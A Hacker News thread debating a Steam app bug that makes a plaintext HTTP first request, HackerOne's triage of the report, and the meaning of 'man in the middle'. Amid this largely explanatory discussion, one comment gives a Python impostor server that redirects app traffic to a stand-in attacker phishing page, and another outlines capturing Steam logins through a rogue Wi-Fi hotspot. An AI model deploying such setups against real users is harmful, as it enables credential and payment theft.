Valve and HackerOne: how not to handle vulnerability reports (jakegealer.me)
243 points by andrenotgiant on April 14, 2020 | 157 comments


I think Valve and HackerOne handled this poorly, but I think the author is partially at fault for repeatedly failing to communicate the issue clearly.

I worked as a penetration tester for a while, and I had trouble understanding what the author was saying. The headline should have been that the steam mobile app makes requests to the plaintext HTTP URL (http://store.steampowered.com) instead of the TLS-authenticated URL (https://store.steampowered.com). Without TLS, an attacker can impersonate the Steam store server and steal credit cards or trick users into installing malicious apps.

The author reported this as:

>The vulnerability is that an attacker can perform a man in the middle attack by spoofing an HTTP request pretending to be from store.steampowered.com. While the client does check for an eventual HTTPS redirect, it can redirect to an HTTPS URL.

There's so much ambiguity and missing information in that writeup:

* Who does the attacker send an HTTP request to? I think the author meant to say an HTTP response.

* In "it can redirect," does "it" refer to "the client" or "the redirect"?

* I think "it can redirect to an HTTPS URL" was supposed to be "any HTTPS URL."

* Why is the client vulnerable? What should they be doing instead?

Also, the author's exploit scenario is to just make the Steam app load his portfolio page, which might have further muddled things. It sounds inconsequential that an attacker can trick Steam users into visiting a developer's portfolio page. It might have been a clearer report if the proof-of-concept redirected to a website that looked like the Steam store but had a warning saying, "I'm an evil copy of the Steam store that will steal your credit card number."
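For illustration, here's a minimal sketch (in Python; the redirect target and names are my own hypothetical choices, not from the actual report) of what such an impostor server could look like on a network where the attacker controls DNS for store.steampowered.com:

```python
# Sketch of the attack path described above: because the app's first request
# is plain HTTP, nothing authenticates the responding server, so this
# impostor can answer in place of the real store. FAKE_STORE is illustrative.
from http.server import BaseHTTPRequestHandler, HTTPServer

FAKE_STORE = "https://attacker.example/fake-steam-store"  # attacker-chosen page

class ImpostorHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Redirect every plaintext request to the attacker's HTTPS page.
        self.send_response(302)
        self.send_header("Location", FAKE_STORE)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the sketch quiet

def run(host: str = "0.0.0.0", port: int = 80) -> None:
    # Serve forever on the port the app's plaintext request arrives on.
    HTTPServer((host, port), ImpostorHandler).serve_forever()
```

With TLS, the app would reject this server's certificate; over plain HTTP, the app has no way to tell it apart from the real store.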


I'm not a security expert. I am a software engineer; as such, I make it my responsibility to understand something of network security, but I have no formal training in it and I don't work in a specifically security-focused role. Nor do I work for an explicitly security-focused company.

I understood the issue clearly on first read.

You're absolutely right that it could have been explained more clearly, and that there is some ambiguity in the wording (not everyone's a perfect communicator). But if I (a very normal, non-security-focused software engineer) can grok this, it's the absolute least I would expect from someone working for HackerOne! Their entire job is to be able to understand this sort of thing in depth.


Exactly! I was sitting there scratching my head on this one. I get that Joe Shmoe wouldn't understand the risks of a MITM and the potential areas it could be exploited; I wouldn't even guarantee that John Q. Programmer understands the risks.

But a person working at Hacker One whose job is assessing vulnerabilities doesn't understand the threat of a MITM? What?! Does everyone at Hacker One think the whole move to HTTPS was just pointless security theater or something? How is that possible? How does this chain of events even happen? It looks like the author spoke to multiple people at Hacker One who were genuinely not understanding the threat, even after it was explained to them.

We must be missing some side of this here. That's too absurd to be real.


I skimmed it. He saw a bunch of HTTP GETs, then set up a DNS server, and ohh, I see where he's going with this. Yep, a picture of a weird page in the Steam app, OK, I get it.


> I think the author is partially at fault for repeatedly failing to communicate the issue clearly.

I disagree. The first sentence of the report includes "HTTP", "man in the middle attack", and "store.steampowered.com".

If that isn't clear to someone, they are not sufficiently trained to triage vulnerability reports. You simply cannot do that job right if you need the reporter to walk you through the difference between HTTP and HTTPS and why you would use the latter for an online store.


I immediately understood what he was saying right from the start. He even mentions there is an eventual https redirect, but the app should start with the https request!

I've got about 20 years of experience as a software dev. I probably would have written it differently, but at the same time .. I fully understood what he was saying immediately. There's nothing difficult to understand there.

We're never even talking about HSTS or certificate pinning. We're just talking about the very first call from the mobile app to their website/api.


Respectfully disagree with this one. We don't even have a bounty program, and we get at least 10 non-issues for every actual potentially exploitable report.

I can definitely see someone reviewing this and accidentally putting it in the "not a problem" bucket. From our perspective, the best vulnerability reports look like:

"This potential exploit can crash your node"

"This potential exploit can steal user funds"

Etc.

It really helps us filter through the nonsense reports we get.


While I can see what you're saying, you also have to properly compute, on your end, a cost for a False Positive and a cost for a False Negative.

In my opinion, in the case of security, I think a False Negative should weigh a lot, and thus measures to prevent it should be in place (i.e. not having an intern mindlessly looking through issues and sorting them into buckets).

Of course, the cost of each will depend on your app/company, its industry, its size, and so on.


Do note that mtlynch is not saying that it's all the author's fault and that Valve/HackerOne couldn't have handled this better.

What you've written can be true and, at the same time, what mtlynch has written can be true too. Everyone could do better here.

But feedback given to Valve/HackerOne via a Hacker News thread is unlikely to be read. The feedback to the author is more likely to be read by the author themselves and by other aspiring penetration testers.

So in the end, everyone could have done better.


I feel like that issue-translation step is part of what HackerOne is actually there to do, though. They serve as a collection and initial triaging point... if they are bad at doing a first pass of issue triaging and clarification, then what are they even doing?

Additionally, the person at HackerOne did ask for some clarification around the issue. That's great, as it helps with identification, but the clarification probably also needs to cover expressing the problem in a way that's clearer to read.


Indeed, I agree with you. Poorly handled. But that doesn't mean you as a penetration tester can't _also_ do better, to avoid similar future scenarios where they handle things poorly.


Since I see people on HN get this wrong more than 90% of the time I want to demystify the term Man in the Middle.

https://en.wikipedia.org/wiki/Man-in-the-middle_attack

The Wikipedia article's description is correct. MITM is a cryptographic attack where an impostor is performing certificate interception and so relays encrypted traffic. MITM is not merely listening to just any traffic.

If the violation occurred over port 80, it's a safe bet there is no man in the middle attack. If I were doing security triage and I saw "man in the middle" and anything about HTTP or port 80, I would not consider this a priority ticket.

This incident is just a software defect rather than a security violation from the unexpected use of a reverse proxy: https://en.wikipedia.org/wiki/Reverse_proxy

An unsupported reverse proxy was only possible because the site was transmitting over HTTP instead of HTTPS.

> If that isn't clear to someone

It isn't clear merely because you used the scary term: MITM. A trained security professional performing triage would devalue the security ticket pending further investigation.


I do not understand the distinction you are trying to make. MITM has nothing in particular to do with certificates, and describes any attack in which Alice <--> Bob, cryptographically or otherwise, and Mallory intercepts and controls communications via Alice <--> Mallory <--> Bob. Essentially every malicious proxy attack is a MITM.

The bug here seems to be that the Steam local app relies on an HTTP 80/tcp connection for first contact with Steam's backend. That's a legit finding. The "requires physical access" thing seems pretty obviously to be a misapplication of the H1 scope.


> The bug here seems to be that the Steam local app relies on an HTTP 80/tcp connection for first contact with Steam's backend. That's a legit finding.

I agree that it is a valid finding, but it's reported in wildly different terms than what you just described. That is just cause to triage a reported incident as low priority.


"The vulnerability is that an attacker can perform a MITM attack by spoofing an HTTP request pretending to be from store.steampowered.com".

The blog post writeup isn't the best in the world, but the actual H1 submission seems fine.


If the traffic is redirected using a reverse proxy at what point does that traffic reach the intended destination? It doesn't. It reaches the impostor destination.

In order for a MITM attack to occur the attacker must establish trust with both end points, which isn't happening in this case.


Oh, I see the point you're making. Yeah, that's true. Sorry!


You are contradicting the WP description; there is no cryptography required to meet the definition:

"In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other"

The WP definition is the commonly accepted one too, not a case of WP getting it wrong.


> "In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other"

If the attack is redirecting traffic away from the server at what point does the server believe it is communicating with the user? The server cannot validate the user traffic since it does not have it.

> The WP definition is the commonly accepted one too, not a case of WP getting it wrong.

That is the opposite of what I said.


My comment was just on the misconception of what MITM is.

That being said, I do think the article's documented report clearly demonstrated how the app was vulnerable to MITM even if the PoC didn't implement the attack all the way. And as a word of advice to the vendor, you probably don't want to train all your well meaning vulnerability researcher pals to productise their vulnerability PoCs into production quality exploits, lest they get the temptation to sell them on other types of markets...


But here, there's no communication with store.steampowered.com. I mean, there could be— oh, yeah, getting it now. That's much worse than I thought it was; you could extract money from the account via gifts without even getting the user to re-enter their bank details.


> If the violation occurred over port 80 its a safe bet there is no man in the middle attack. If I were doing security triage and I saw "man in the middle" and anything about HTTP or port 80 I would not consider this a priority ticket.

Can you explain this more? Are you just arguing that it's unencrypted and therefore by definition not MITM? I'm skeptical that this is common usage of the term (the Wikipedia article you linked to seems to disagree with you). And this seems a little like saying that you wouldn't be concerned about a privilege-escalation attack since you're inadvertently running everything as root.


> Are you just arguing that it's unencrypted and therefore by definition not MITM?

That is exactly what I am saying for 2 reasons.

1. If the connection is HTTP instead of HTTPS there is no trust. MITM is a trust-violation attack, which cannot be present if there is no trust to attack.

2. All kinds of software and hardware redirect traffic under normal operating conditions. That isn't a MITM merely because the path of traffic, or even the end point, is different than expected. For instance, a load balancer could route you from an expected location to a different physical data center, which is a completely different end point both physically and logically, but it's not necessarily an attack if you are still where you want to be and both end points trust each other.

The reason why trust is available with HTTPS and not HTTP isn't even because the pipe is encrypted, but because HTTPS uses certificates and HTTP does not. MITM is all about a trust violation. Certificates are not required with HTTPS, but your browser yells at you when a certificate is absent or untrusted.


> MITM is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. - Wikipedia on MITM

1. The steam client ("The App") thinks that it's communicating with Valve Inc. via store.steampowered.com ("The Store")

2. The App fails to validate that it is actually communicating with The Store by not using https

3. Thus, an attacker with control of an external network (e.g. a coffee shop wifi) can "secretly relay and possibly alter the communication between The App and The Store who believe they are communicating with each other"

I don't know how this could be any less than the definition of a MITM by wikipedia's own standard. That this kind of attack is also related to cryptography is immaterial to the fact that a reverse proxy is a MITM. It doesn't somehow make it not MITM because they weren't using any cryptography, it means that they failed to implement a protocol that sufficiently protects against MITM.


> 2. The App fails to validate that it is actually communicating with The Store by not using https

That is the software defect, and that alone. Everything else is completely working as designed, even if the results are not expected. That does not rise to the level of a MITM.

> 3. Thus, an attacker with control of an external network (e.g. a coffee shop wifi) can "secretly relay and possibly alter the communication between The App and The Store who believe they are communicating with each other"

In that scenario the store would never believe it is talking with one of its users, because the traffic was relayed to an alternate location. Therefore it's an impersonation and not a MITM.


> That does not rise to the level of a MITM.

You're not gaining any ground by claiming the existence of "levels" of MITM. A MITM vulnerability is failing to validate who you're communicating with. The Steam App did this. Thus Steam is vulnerable to a MITM attack.

> In that scenario the store would never believe it is talking with one of its users because the traffic was relayed to an alternate location. Therefore it's an impersonation and not a MITM.

I don't understand what this means? The Store (store.steampowered.com) believes that the user is anyone who can produce the user's credentials. The App represents the user by holding the user's credentials. The App tries to connect to The Store and believes that the world is thus: The App -> The Store. But The App fails to validate this and can be tricked into the world where: The App -> Attacker -> The Store (this is the MITM). The Store never has any more information than 'Someone with The User's credentials is connecting': Someone (with User's credentials) -> The Store. The Store's picture of the world is identical in both cases, it cannot distinguish a true user from an attacker if both have the user's credentials. This doesn't have anything to do with The Store and everything to do with The App.


> The Steam App did this.

It did not, because it cannot validate what it does not have. The reverse proxy in question redirects traffic away from the server to an unrelated location. As such there is nothing for the server to validate since the user traffic is somewhere else.

> Thus Steam is vulnerable to a MITM attack.

The traffic did not go through the attacker to the intended end point. It just went to the attacker.

> I don't understand what this means?

Impersonation is pretending to be somebody else. MITM is more than impersonation in that it must fool both end points, not just the user, of the connection.

> The Store (store.steampowered.com) believes that the user is anyone who can produce the user's credentials.

You are insinuating a replay attack, but there is no evidence of a replay attack. In a replay attack one end of the communication sends a message and an intercepting attacker replays the message for the distant end.

https://en.wikipedia.org/wiki/Replay_attack

Literally all that happened is that the attacker intercepted traffic and redirected it to a different location that is not the intended server. That is IP address spoofing, which is bad but far less bad because it's easy to find if you are looking for it. For this to be a MITM, the attacker would have to intercept the traffic and route it to the intended server. MITM attacks are severe because they are very challenging to detect, since both end points believe the attacker is their intended end point and both end points are exchanging data without any indication that trust is violated.

* https://en.wikipedia.org/wiki/IP_address_spoofing

* https://www.techopedia.com/definition/4020/masquerade-attack


> MITM is more than impersonation in that it must fool both end points, not just the user, of the connection.

You are correct, this particular implementation of the attack did not demonstrate MITM directly. But it did successfully demonstrate that a MITM attack was possible, because MITM directly follows from the client not validating the authenticity of the server. The fact that this implementation displayed their own page instead of proxying store.steampowered.com and logging the requests is utterly immaterial to vulnerability's viability as a tool for a MITM attacker.

If you're saying that this is not a MITM vulnerability because the vulnerability demo loaded their own page instead of Valve's... well that's a stupid argument, and it doesn't refute anything about the client application being vulnerable to MITM.

> You are insinuating a replay attack

I am not. The statement "The website believes that the user is anyone who can produce the user's credentials." is a universal truism that applies to every service ever created. This has nothing to do with replay.

> Literally all that happened is that the attacker intercepted traffic and redirected it to a different location that is not the intended server.

So literally all that server would have to do is respond with the actual html content from the store, and suddenly you would change your mind about whether this effectively demonstrates a MITM vulnerability? Your arguments are not making sense.


The wikipedia article you cite as evidence lists several examples where no cryptography is involved as MITM attacks. As do many other sources.

e.g. OWASP: https://owasp.org/www-community/attacks/Man-in-the-middle_at...


> The wikipedia article you cite as evidence lists several examples where no cryptography is involved as MITM attacks.

It only lists one example about key exchange. That is different than certificate exchange, but not for the point of this conversation.


Plaintext HTTP in itself isn't a vulnerability.

Suppose that Steam ran some kind of load balancing server at http://loadbalancer.steam.com (no TLS). Its only job is to respond to HTTP GET requests with the URL of the least-busy steam server like "https://a.store.steampowered.com" or "https://b.store.steampowered.com".

If the mobile client makes the request to the load balancer over plaintext HTTP and then verifies that the response has the steampowered.com domain and is https:// then that's not a vulnerability, despite the fact that an attacker can MitM the plaintext HTTP part.

I would recommend that Steam just do everything over HTTPS for the sake of defense in depth, but I definitely wouldn't award a bounty to someone for proving they could MitM my load balancer and cause no damage. The worst the attacker can do in that scenario is cause the app to see network failures (specifically, TLS handshake failures), but if the attacker is middling traffic, that's possible regardless.


No. No. No. No! Everything about this is wrong.

The load balancer ABSOLUTELY should be HTTPS only, and all requests from the app, from the very first request, should be over HTTPS. If you want more security, add Strict Transport Security as well as certificate pinning in the app.

But at a very basic level, there is absolutely no excuse for this app to be making plain-text HTTP requests to Steam at all.

In your example, I could set up a free Wi-Fi hotspot with a different DNS entry for http://loadbalancer.steam.com, have it go to my local nginx server with a page that looks exactly like Steam's login, capture their user credentials, and then redirect them to actual Steam.

You can't just have a plain text load balancer redirect to https because someone else can intercept you BEFORE that redirect takes place.


>In your example, I could set up a free Wi-Fi hotspot with a different DNS entry for http://loadbalancer.steam.com, have it go to my local nginx server with a page that looks exactly like Steam's login, capture their user credentials, and then redirect them to actual Steam.

Sorry, I don't think I communicated my hypothetical app clearly. Imagine the sequence is like this:

1. App makes a background HTTP request to http://loadbalancer.steam.com

2. Load balancer responds with a URL string like "https://a.steampowered.com"

3. App verifies that the domain ends with "steampowered.com" and starts with "https://"

4. If verification passes, app loads the response URL in the in-app browser

In that case, replacing http://loadbalancer.steam.com with a spoofed page doesn't do anything because the app's internal logic sees the response, not a human user. If you replaced it with anything but a https://*.steampowered.com, the app would refuse to load the URL, so I don't see the vulnerability.
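Concretely, here's a literal sketch of those four steps (my own illustration; the load-balancer URL and helper names are hypothetical, not real Steam endpoints):

```python
# Hypothetical client logic for the load-balancer design described above.
from typing import Optional
from urllib.parse import urlparse
import urllib.request

LOAD_BALANCER = "http://loadbalancer.steam.com"  # hypothetical plaintext endpoint

def verify(candidate: str) -> bool:
    # Step 3 as literally stated: scheme must be https and the hostname
    # must end with "steampowered.com".
    parsed = urlparse(candidate)
    return parsed.scheme == "https" and (parsed.hostname or "").endswith("steampowered.com")

def pick_store_url() -> Optional[str]:
    # Steps 1-2: background plaintext request returns a URL string.
    with urllib.request.urlopen(LOAD_BALANCER, timeout=5) as resp:
        candidate = resp.read().decode().strip()
    # Step 4: only a verified URL is handed to the in-app browser.
    return candidate if verify(candidate) else None
```

Whether the suffix test in `verify` is actually strict enough is a separate question from whether the plaintext first hop is itself exploitable.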


1. Nobody competent would do this in a modern design.

2. Any security engineering team would flag this design.

3. Allowing https:// (anything) .steampowered.com / (anything) allows for arbitrary redirection into any property under that domain, some of which could be user (or customer) controlled. Does that matter on this domain? Who cares? Why have a design where you even have to ask?

The first contact with the load balancer should be HTTPS.


Hey Thomas, you actually kind of started me in web app security. You interviewed me for Matasano, and when I told you I didn't have experience with web apps, you overnighted me a copy of The Web Application Hacker's Handbook. You ultimately made me an offer, but after difficult deliberation, I ended up joining iSEC. Thanks again for sending me the book! It's been tremendously helpful.

I 100% agree that people shouldn't design systems this way, and if I were still a pentester, I'd write it up if I found it. But if the implementation correctly checked the domain and verified it was https:// (and maybe did some cert pinning), I couldn't justify anything higher than low severity.

We've kind of gone way into the weeds on my made up example, but it was initially in response to this:

>> > I think the author is partially at fault for repeatedly failing to communicate the issue clearly.

> I disagree. The first sentence of the report includes "HTTP", "man in the middle attack" and "store.steampowered.com" ... If that isn't clear to someone, they are not sufficiently trained to triage vulnerability reports.

I just disagree with the idea that any plaintext HTTP request in an app inherently is a vulnerability.


What a nice comment! And in a thread where I am definitely not at my best (it's been an allergy migraine kind of day). This made my evening; thank you. iSEC was a great team!

I'm more of an absolutist about HTTPS than you are, though. :)

I feel like every once in awhile I need to plow face-first into the brick wall of a friendly comment like this just as a signal to dial it back a bit. It's been a challenging couple weeks. I'll dial it back a bit! Thanks again.


This is an insanely flawed design and the responses to it are 100% factually correct in their assessment. loadbalancer.steampowered.com could still respond with a bad entry just as long as it fits the "https://*.steampowered.com" pattern.

If the application does some sort of SSL pinning you may have to MITM the handshake but that's not outside of the realm of possibility for a sophisticated attacker.

I know it's just an example of how something COULD work but I strongly disagree that the following is correct:

> The worst the attacker can do in that scenario is cause the app to see network failures

Also - it's worth noting that all of this DNS talk really makes the whole SSL discussion moot. This is exactly why things like DNSSEC exist. If I'm able to point your traffic wherever, you're done.


No, not at all: the same LAN access that allows him to spoof DNS also allows him to spoof the authenticated-data bit in the DNS header to bypass DNSSEC. This is one of the great failings of DNSSEC.

DoH: different story.


I'm prefacing this with I'm VERY new to DNSSEC (apologies).

I guess I always assumed that DNSSEC would blow up when changing the destination a record points to, but I have never really dealt with many DNSSEC rollouts outside of light maintenance.

Thanks for a great response. I'm going to formally learn DNSSEC, because this is a good flag that I need better understanding. Also, DoH is a new topic to me too, so definitely going to "dig" on that as well ;)


The right way to think of it is that DNSSEC is a server-to-server protocol. It makes it difficult for an upstream authority server to cache a spoofed record in your recursive server. It provides basically no on-the-wire security between your browser and your DNS server.


> If you replaced it with anything but a https://*.steampowered.com, the app would refuse to load the URL, so I don't see the vulnerability.

I’m going to take this as what the intention was when designing this solution.

> 3. App verifies that the domain ends with "steampowered.com" and starts with "https://"

I’m going to take this to be what would have actually been coded in this solution.

I’m now going to register notsteampowered.com, and bypass the bug in the code to deliver an exploit over https.

This solution is fragile. Why not just do the whole thing over TLS to begin with and avoid this vulnerability in the first place?
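To make the fragility concrete, here's a small sketch (my own hypothetical function names) of how a plain suffix check differs from one that respects the domain boundary:

```python
from urllib.parse import urlparse

def naive_check(url: str) -> bool:
    # "Ends with steampowered.com," as literally stated in the design above.
    parsed = urlparse(url)
    return parsed.scheme == "https" and (parsed.hostname or "").endswith("steampowered.com")

def strict_check(url: str) -> bool:
    # Require the exact domain or a true subdomain boundary (a dot before
    # "steampowered.com"), so lookalike registrations don't slip through.
    parsed = urlparse(url)
    host = parsed.hostname or ""
    return parsed.scheme == "https" and (
        host == "steampowered.com" or host.endswith(".steampowered.com")
    )
```

`naive_check("https://notsteampowered.com/login")` returns True, while `strict_check` rejects it; only the latter matches the stated intent of `https://*.steampowered.com`.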


>I’m now going to register notsteampowered.com, and bypass the bug in the code to deliver an exploit over https.

Yeah, that's a good point. That's my mistake in spitballing, but the vulnerability wouldn't exist in an implementation that properly checked the domain.

Again, I 100% agree with you that it's fragile and not a good idea. I wouldn't design a system this way, and I would flag it if I reviewed an app that did this. I was just objecting to the idea that the discovery of any plaintext HTTP request is a bounty-worthy vulnerability.


> and then verifies that the response has the steampowered.com domain and is https://

One would still need a justification for that design IMHO, but I don't think it is vulnerable to what you describe.


It's definitely a fine sanity check but I'd have to really think about whether it's a barrier.

Immediate things I worry about are around URL parsing.

Is evil.com<insert something here>steampowered.com going to pass as "steampowered.com" when it isn't? Will it handle punycode? All sorts of shit can go wrong when parsing a URL, and it's a real world problem when people implement the mitigation you're describing[0].

[0] https://labs.detectify.com/2016/07/27/how-i-made-lastpass-gi...

This is just for starters. I think if I were being paid to think about it I'd probably be able to come up with some more. Can I mess with DNS? Can I inject some other malicious payload into the page, to take advantage of other vulns? etc etc etc

I would be extremely wary of this technique as a real boundary rather than just an assertion in code.


But why even deal with that complexity? It's another place where things can break or you forget something. You can verify the domain there too, but that still doesn't mean you can just make the request for the redirect over HTTP and think that's okay.


> verifies that the response has the steampowered.com domain and is https://

But you're trading an easy solution (only use https://) for several points of failures (validate potentially untrusted input all along the chain).

> verifies that the response has the steampowered.com domain

An attacker is going to look for any exploits on steampowered.com (open redirect, xss, etc.). So now your domain name check is insufficient, you also need to make sure that all of steampowered.com is secure (which, odds are, is managed by multiple teams).


There could also be a captive portal check going on.


No, the problem is that HackerOne isn't actually a "Bug Bounty as a Service" company. It's a "Cover Corporate Asses as a Service" company. They don't care if they don't understand your vulnerability. Their primary value add is that their customers can stick their heads in the sand and still create the impression that their software has no security flaws.

What happens is that HackerOne forces security researchers into one specific workflow. They have an incentive to close as many bug reports as out of scope as possible to avoid paying a bounty. There is no incentive to have qualified staff who actually have the technical background knowledge to determine whether your report is a security problem or not. The fact that reporters have to create a HackerOne account means that HackerOne can ban you from their platform, and you automatically lose the ability to report bugs for other companies. What often happens is that they simply ignore your report and try to pretend it never existed in the first place. When the reporter decides that public disclosure is the path of last resort, HackerOne will respond immediately, blame the reporter for not following the HackerOne workflow, and ban that reporter's account.

The fact that Valve decided to pay money to this company implies that they don't care about security. You can't blame them for not fixing the vulnerabilities when HackerOne is interfering heavily in the process but you can blame Valve for knowingly choosing a company with a horrifyingly bad track record.


So in a nutshell, could we summarise the issue here as "Valve didn't use TLS and thus Valve's users are vulnerable to the exceptionally well-known consequences of not using TLS?"

If so, then... okay, but I don't know what the blog author was expecting when he reported this. Pointing out that HTTP has MiTM possibilities is kind of up there with pointing out that the sky is blue. If, in 2020, a site has made the choice not to upgrade to TLS then it's more likely a conscious decision than an oversight.


It was an oversight. They had HTTPS support. Going by the bug report, the client checked for a redirect to HTTPS, but didn’t check that it was to the correct domain.


OK, that's a little more understandable. I assume that the initial use of HTTP is an intentional tactic that Steam uses to discover whether it is behind a captive portal or similar. That being the case then yes, the Steam client shouldn't rely on the data returned from the HTTP request, and this seems like a bug.


The author stated that Valve ended up patching this and switching to fully-HTTPS, which makes me think that this was a bug and not intentional.


I'm not even a software engineer. Lowly MBA that writes R code. Even I understood the gist. But the part that I understood well is that _this was a HackerOne managed program_, meaning that it's HackerOne's job to take a raw submission and turn it into a well-designed report that can be triaged and fixed.


Thank you. This was a bit confusing. It helped that this was the first paragraph.

>This is my first blog, but I felt like this is something I needed to get off my chest after months. If people enjoy this blog post, I will probably do more in the future.

I'm sure this blog will probably learn a hard and fast lesson on writing thanks to your post. This can't be an easy topic to explain. You did a solid job, thank you again.


That first sentence is a trainwreck but the steps that follow do at least clearly outline the issue.


Companies receive so many "First, you have to be on the other side of this airtight hatch, then you..." reports that anything that looks even remotely like it will just get summarily closed. My personal favorite ones start with some form of "I copied the user's cookies from device A's file-system, and..."

Just some suggestions on how to report these kinds of things, because there is an actual underlying issue here worth fixing. It's good that you didn't mention the reverse proxy. Next, don't say "spoofing an HTTP request" in the first sentence of the report; that's an immediate red flag. If you have access to spoof something on the network, it's already not an issue for 99% of people and an instant low priority. Instead, say "Steam insecurely relies on a redirect response to upgrade the hosted content from HTTP to HTTPS, instead of directly establishing the HTTPS connection". How this can be exploited is now much more general than just being a spoofing issue, with both the problem and solution clearly stated.
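
For what it's worth, the missing check being described can be sketched in a few lines. This is only a sketch: the helper name and the hard-coded expected host are illustrative, not Steam's actual code.

```python
from urllib.parse import urlparse

# A client that bootstraps over plain HTTP should at minimum verify
# that the redirect it follows points at the expected HTTPS origin,
# rather than trusting any Location header an on-path attacker injects.
EXPECTED_HOST = "store.steampowered.com"  # assumed target, for illustration

def is_safe_redirect(location: str) -> bool:
    parsed = urlparse(location)
    return parsed.scheme == "https" and parsed.hostname == EXPECTED_HOST

# The reported bug, per the blog post: the client accepted *any* HTTPS URL.
assert is_safe_redirect("https://store.steampowered.com/app/570")
assert not is_safe_redirect("https://attacker.example/fake-store")
assert not is_safe_redirect("http://store.steampowered.com/")  # no downgrade
```

Of course, the real fix (and what Valve reportedly shipped) is to skip the plaintext bootstrap entirely and connect over HTTPS from the start.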


I've been on both sides of this, and sadly having HackerOne/BugCrowd as intermediaries often hurts more than it helps.

On one hand I've had to sort through the never ending stream of "if you bypass the safeguards first" issues and some guy in India copying and pasting open source vuln scanner reports. I get why people don't want to deal with this and outsource it.

On the other hand, I have a legitimate exploit against GitHub that is "working as intended" for months now. No amount of back and forth is going to convince them that leaking commit messages on enterprise accounts is serious apparently.


> No amount of back and forth is going to convince them that leaking commit messages on enterprise accounts is serious apparently.

If true, this deserves a write-up.

I'm sure a few enterprise accounts might agree, if anyone can see their dev-branch commit named "feature xyz" a month before they announce it.


Joke's on you:

    trying to fix bug
    maybe this?
    fuck
    idk
    idk
    idk
    maybe works
    k ready now


But also: "fix stupid fucking sql injection"


This sounds far worse than just leaking branch names. They said it’s leaking entire commit messages.

Those messages could contain very detailed descriptions of how a company's product works, or how a company's fraud controls operate.


Sorry, that's what I meant. I should rephrase: a commit message for a commit on the dev branch.

I was assuming a relatively lazy commit message as an example. You're correct in identifying that certain organizations might put a lot of information into a commit message.


Can you publish more details? Consider pastebin, github, personal blog, anywhere you can really.

Enterprises, as in publicly traded companies, should definitely not be leaking products and roadmaps, because this affects their stock values. I bet regulators won't like that, and it will be fixed in a heartbeat.

edit: the CEO of GitHub is commenting on another front-page article; might want to drop a word. https://news.ycombinator.com/item?id=22867627


Simply say that there is a typo in the steam configuration, it is connecting to the (insecure) URL http://...

This allows steam network traffic to be intercepted. It can be fixed by correcting the URL to https.

For example, somebody using steam from a coffee shop could have his credentials/cookies/accounts intercepted by the coffee shop operator or any other visitor.

I believe coffee shops and other gaming venues are a supported use case for Steam, and you do not wish to leave your users at risk.

IMO there is really no need to blow this out of proportion. It's just a typo. Developers make typos all the time. I bet they're more likely to double-check something trivial like that if it's pointed out.


This is most likely not a typo. The redirect from http to https is most likely due to Valve using a self-signed SSL certificate and not directly exposing it to ATS (iOS). If they went directly to the https endpoint, the OS would block the traffic over an invalid (not CA-signed) SSL certificate.


store.steampowered.com is a fully web accessible site with a CA signed certificate though. It's the main steam marketplace. I think the whole point is that they are leveraging this for their app, so using a self-signed CA doesn't make a lot of sense in that case (not that I'm sure it ever would for a company these days, SSL certs are cheap).


I don't think you understand. There is no such thing as a "self-signed" CA cert (it's one or the other). This is not about money, it's about control. There are many benefits to using a self-signed SSL cert over purchasing a CA one. However, Apple and Android inherently distrust self-signed certs, so you have to actually provide the cert directly to ATS/Android OS, which involves bundling it within the app (a messy process). The current industry "hack" is to use http within the app and then redirect to https (which is exactly what the Steam app does).


I understand, I mis-typed. I meant self-signed cert. That should have been pretty obvious from what I actually posted though.

https://store.steampowered.com is the official steam marketplace. It does not use a self-signed certificate.

> There are many benefits to using a self-signed SSL cert over purchasing a CA one.

I'm sure there are (not that any are immediately coming to mind), but this is the official web marketplace. It is NOT self-signed. It's signed by DigiCert, Inc, which is easy to check if you go there.

To clarify, store.steampowered.com is not some special app store subdomain. It's the official store, and where you are redirected in a browser if you go to steampowered.com. It is very unlikely they are using a self-signed certificate given it's an actual web address used by many tens of millions of people in their browsers primarily.


I'm not a Valve developer so I can't tell you exactly what is happening, but you most certainly can serve different certificates to browsers vs. mobile. The apps use WebViews, which are not the same as Chrome and Mobile Safari. It would make sense to use a CA cert for normal browser traffic, as the browser is fairly sandboxed as far as what you can and cannot do; the WebViews are a completely different environment.

Again I'm saying this based on real world experience with why someone would use http instead of https, so my point is just a guess. I might be giving Valve too much credit and trying to explain something that is just a mistake. I am basing my theory on the fact that the http endpoints immediately re-direct to https ones, so it seems to be intentional for one reason or another.


> I am basing my theory on the fact that the http endpoints immediately re-direct to https ones, so it seems to be intentional for one reason or another.

I don't know, that seems pretty bog-standard to me. You redirect to HTTPS when someone requests HTTP and you want all your traffic to be secure. At least, that's how it used to be; these days browsers may be more aggressive in trying to hand you the HTTPS version of sites if port 80 doesn't respond, and in that case it might make more sense to turn down port 80, as long as all browsers do the right thing.


>There is no such thing as a "self-signed" CA cert, (its one or the other).

Not sure what you're trying to say here. What a cert is signed by and what a cert's usage is set to are orthogonal things. There are CA certs that are self-signed (look in your OS's trusted roots cert store) and there are CA certs that are signed by other CA certs (intermediate CA certs).
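
A toy sketch of that orthogonality, with a dict standing in for a certificate (purely illustrative, not a real X.509 API): "self-signed" just means issuer equals subject, and the CA flag is a separate property.

```python
# Hypothetical classifier showing that "self-signed" and "is a CA" are
# independent: a trusted root is a self-signed CA cert, an intermediate
# is a CA cert signed by another CA, and a leaf may itself be self-signed.
def classify(cert: dict) -> str:
    self_signed = cert["issuer"] == cert["subject"]
    if cert["is_ca"] and self_signed:
        return "root CA"
    if cert["is_ca"]:
        return "intermediate CA"
    return "leaf" + (" (self-signed)" if self_signed else "")

root = {"subject": "Example Root", "issuer": "Example Root", "is_ca": True}
leaf = {"subject": "store.example", "issuer": "Example Root", "is_ca": False}
assert classify(root) == "root CA"
assert classify(leaf) == "leaf"
```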


You can create your own CA and then add it to the trust/keystores of your applications. It's exactly the same thing that public CAs are doing. They strike a deal with browsers and operating systems and get added to those stores.

